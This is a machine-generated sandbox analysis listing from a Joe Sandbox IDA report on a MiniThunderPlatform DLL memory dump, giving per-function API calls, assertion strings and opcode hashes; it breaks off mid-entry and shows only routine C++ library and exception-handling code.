                                                                                                                                                • Part of subcall function 10095E80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10095EF3
                                                                                                                                                • Part of subcall function 10095E80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095F0A
                                                                                                                                                • Part of subcall function 10095E80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095F19
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A43B3
                                                                                                                                              Strings
                                                                                                                                              • not opened, can't query file_type_header_value, xrefs: 100A436C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@V01@@$??0exception@@ExceptionH_prologThrow
                                                                                                                                              • String ID: not opened, can't query file_type_header_value
                                                                                                                                              • API String ID: 2396310601-3586627260
                                                                                                                                              • Opcode ID: f84ef8d5a8f2f7bc9f83e2c56fd7f92b48c6c634697326ff11a246320d0a0377
                                                                                                                                              • Instruction ID: b74c4aa2dc92a7b92e3c7572a9ff340836130196616514beca1e5b01f027833b
                                                                                                                                              • Opcode Fuzzy Hash: f84ef8d5a8f2f7bc9f83e2c56fd7f92b48c6c634697326ff11a246320d0a0377
                                                                                                                                              • Instruction Fuzzy Hash: 8F11947A104780DFC715DB59CC50A9BF3E5FBD9610F008A2EF55A93340CB35A905CB52
                                                                                                                                              Function 1003D140 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1003D17B
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??3@H_prologV01@@
                                                                                                                                              • String ID: .\asyn_io_operation.cpp$segments_num != 0$thunder_assert
                                                                                                                                              • API String ID: 1027865869-4219060924
                                                                                                                                              • Opcode ID: 8fd351819e214b13dcfe4b2f09be467eb2069531120dbe20789edc879a98480c
                                                                                                                                              • Instruction ID: 6728b9421c9338522cd279a163a85324cc5637fa66449347949c56e2e5c288ed
                                                                                                                                              • Opcode Fuzzy Hash: 8fd351819e214b13dcfe4b2f09be467eb2069531120dbe20789edc879a98480c
                                                                                                                                              • Instruction Fuzzy Hash: 5E018CB1A003086FE710DE39EC82B97B3D8FB64256F44442EE94ED3202DB32B9248761
                                                                                                                                              Function 10020173 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • DisableThreadLibraryCalls.KERNEL32(?), ref: 100201A3
                                                                                                                                                • Part of subcall function 10013610: ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71 ref: 10013678
                                                                                                                                                • Part of subcall function 10013610: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000000,00000001), ref: 10013690
                                                                                                                                                • Part of subcall function 10013610: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,102404D3,000000FF,1001C2E6,?,?,00000000), ref: 100136B1
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100201CC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100201D5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@V01@@$?rfind@?$basic_string@?substr@?$basic_string@CallsDisableH_prologLibraryThreadV01@V12@Y?$basic_string@
                                                                                                                                              • String ID: prop.txt
                                                                                                                                              • API String ID: 1535647739-292457697
                                                                                                                                              • Opcode ID: 57e7234f2afbcd4be898ca50276132e564d26134fbc5408c2a3331164fabd34a
                                                                                                                                              • Instruction ID: ad6afa6f122c58b80bf1f6c29a02a8e247259d02919eb79b0bfa5298f829a963
                                                                                                                                              • Opcode Fuzzy Hash: 57e7234f2afbcd4be898ca50276132e564d26134fbc5408c2a3331164fabd34a
                                                                                                                                              • Instruction Fuzzy Hash: 75017135900128ABDF04EFA0DC49DDE77B9EF19354F808419F802A7151DB34A654CBA1
                                                                                                                                              Function 1005D1AE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 1005D206
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$AssignH_prologV01@@
                                                                                                                                              • String ID: .\dl_plugin_fs.cpp$NULL != _pFIS$thunder_assert
                                                                                                                                              • API String ID: 1023840165-1905948359
                                                                                                                                              • Opcode ID: cc18bb81bc3f23175356fb3b164e72495895f329dea5d1ce340bdf1e4afec571
                                                                                                                                              • Instruction ID: 01b44f4b57ffd03dbf641491c552abaff9d6acd85b02b5b32c971d69dfe24d73
                                                                                                                                              • Opcode Fuzzy Hash: cc18bb81bc3f23175356fb3b164e72495895f329dea5d1ce340bdf1e4afec571
                                                                                                                                              • Instruction Fuzzy Hash: 44F09075400B00AFD720EBA0CC09F5B77A5FF69315F018C0AF45597252C770B45586A6
                                                                                                                                              Function 10085160 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 21COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __aulldiv.LIBCMT ref: 10085196
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prologV01@@__aulldiv
                                                                                                                                              • String ID: .\bcids_info.cpp$_block_size != 0$thunder_assert
                                                                                                                                              • API String ID: 2143915368-1568384318
                                                                                                                                              • Opcode ID: 2e79ad41537111d63314df9271d50bfe5010af4f37a61a3bba4f7425bd8e55a5
                                                                                                                                              • Instruction ID: 64b08c7b5cde1454239bf29b77f8e96f852ca4f907dbd2708cededbd302ef8c9
                                                                                                                                              • Opcode Fuzzy Hash: 2e79ad41537111d63314df9271d50bfe5010af4f37a61a3bba4f7425bd8e55a5
                                                                                                                                              • Instruction Fuzzy Hash: 74E08C796003017BE260DA249C82FA7B3E8EBA4241F418A0AB950A7281D670B8A083A0
                                                                                                                                              Function 100D424C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100D4251
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 100D4261
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71 ref: 100D4287
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prologU?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 1391971735-3788999226
                                                                                                                                              • Opcode ID: f76038e0a7e7713f1ce3a677321a30c8af60b7d0373ebf5e8385694ab2f6c8e1
                                                                                                                                              • Instruction ID: bd64fd1a6b78c5e4832ec5c8e9be5b5da15a36d42d5d4a8eea1328878ebc5b3b
                                                                                                                                              • Opcode Fuzzy Hash: f76038e0a7e7713f1ce3a677321a30c8af60b7d0373ebf5e8385694ab2f6c8e1
                                                                                                                                              • Instruction Fuzzy Hash: E4E0ECB6810218DBC711DBD0CC89AEEB778FF2D352F804118E007B6444DB716658CB36
                                                                                                                                              Function 10035490 Relevance: 6.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 100355EE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: 7316c0d8710fcdf122c426525d1826c2ccab378783d2a1111babaff485a26772
                                                                                                                                              • Instruction ID: ff1401d07f7960192ef95f6cf5d1cae11a8d3068f7b6878b899faead68df9c39
                                                                                                                                              • Opcode Fuzzy Hash: 7316c0d8710fcdf122c426525d1826c2ccab378783d2a1111babaff485a26772
                                                                                                                                              • Instruction Fuzzy Hash: A3819475A006069FC725CF69C884A9B77E6FBC4256F14C62DEC1ACB354E631F901CB90
                                                                                                                                              Function 10069310 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memmove.MSVCR71(?,?,00000000), ref: 10069526
                                                                                                                                                • Part of subcall function 1005F9B0: memmove.MSVCR71(00000000,?,0000001C,?,0000001C,?,00000000,00000000,0000001C,1006439B,?,00000001,?,?,?,00000000), ref: 1005FA84
                                                                                                                                                • Part of subcall function 1005F9B0: memmove.MSVCR71(00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 1005FAAB
                                                                                                                                                • Part of subcall function 1005F9B0: ??3@YAXPAX@Z.MSVCR71(?), ref: 1005FACE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memmove$??3@
                                                                                                                                              • String ID: .\io_manager.cpp$new_request_ptr$thunder_assert
                                                                                                                                              • API String ID: 2321372689-1330268826
                                                                                                                                              • Opcode ID: ee44c6bcf0ddc49be505b82dc0361f237c7fe71eb8b4f67cf10329cc428adbd1
                                                                                                                                              • Instruction ID: cee98619318f82b792dc7987a6735653fd71923ecafbabb3f67a2add3132aaae
                                                                                                                                              • Opcode Fuzzy Hash: ee44c6bcf0ddc49be505b82dc0361f237c7fe71eb8b4f67cf10329cc428adbd1
                                                                                                                                              • Instruction Fuzzy Hash: 77814770A097429FC714CF29C58095AFBE6FFD8350F508A2DE98A87B10E730E941CB82
                                                                                                                                              Function 10084090 Relevance: 6.2, APIs: 4, Instructions: 186COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,?,00000003,?,00000003), ref: 100840D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??$?D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3947435496-0
                                                                                                                                              • Opcode ID: 4b0c7053503d220348113edfe93fcd43c828805e2831b650785251516fc38e38
                                                                                                                                              • Instruction ID: c15da9e6f12c07865908d6ba10d4668c866306541aadba3bedf7b0adfe2221e5
                                                                                                                                              • Opcode Fuzzy Hash: 4b0c7053503d220348113edfe93fcd43c828805e2831b650785251516fc38e38
                                                                                                                                              • Instruction Fuzzy Hash: E051A2367002005BCA00DB09EC81EABB3E9FFD9A15F04445FF98597251DA62ED19C6B2
                                                                                                                                              Function 100580A0 Relevance: 6.2, APIs: 4, Instructions: 186COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,00000000,00000014,?,?,?), ref: 100580E7
                                                                                                                                                • Part of subcall function 10057AD0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,?,?,?,?,?,?,?,?,?,?,?,102452A2,000000FF,10057D3D,?), ref: 10057AFD
                                                                                                                                                • Part of subcall function 10057AD0: ??0exception@@QAE@XZ.MSVCR71 ref: 10057B0F
                                                                                                                                                • Part of subcall function 10057AD0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10057B2B
                                                                                                                                                • Part of subcall function 10057AD0: _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 10057B48
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@D@2@@std@@$??$???0exception@@D@1@@std@@D@2@@0@0@ExceptionThrowV01@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3789410778-0
                                                                                                                                              • Opcode ID: 1118e550b501fdacbd25adb775084ba38838535799a2c0eb79099addd54962a1
                                                                                                                                              • Instruction ID: 802da77eaebbc9c26c3608ad0cda91b7723ad6c456dad05fe2c743b50a83c133
                                                                                                                                              • Opcode Fuzzy Hash: 1118e550b501fdacbd25adb775084ba38838535799a2c0eb79099addd54962a1
                                                                                                                                              • Instruction Fuzzy Hash: EF51A33A3002005BC600DB09EC81EAFB3E9EFD9A55F04455EFD49A7241D662EE1DC7B6
                                                                                                                                              Function 10055630 Relevance: 6.2, APIs: 4, Instructions: 186COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,00000000,?,10311FB4,00000000,00000000,?,?,?,?,00000000,10245138,000000FF,10055A0B,?), ref: 10055677
                                                                                                                                                • Part of subcall function 10054F60: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,00000000,?,?,?,?,?,?,?,?,?,?,10245122,000000FF,100552DD,?), ref: 10054F8D
                                                                                                                                                • Part of subcall function 10054F60: ??0exception@@QAE@XZ.MSVCR71 ref: 10054F9F
                                                                                                                                                • Part of subcall function 10054F60: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10054FBB
                                                                                                                                                • Part of subcall function 10054F60: _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 10054FD8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@D@2@@std@@$??$???0exception@@D@1@@std@@D@2@@0@0@ExceptionThrowV01@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3789410778-0
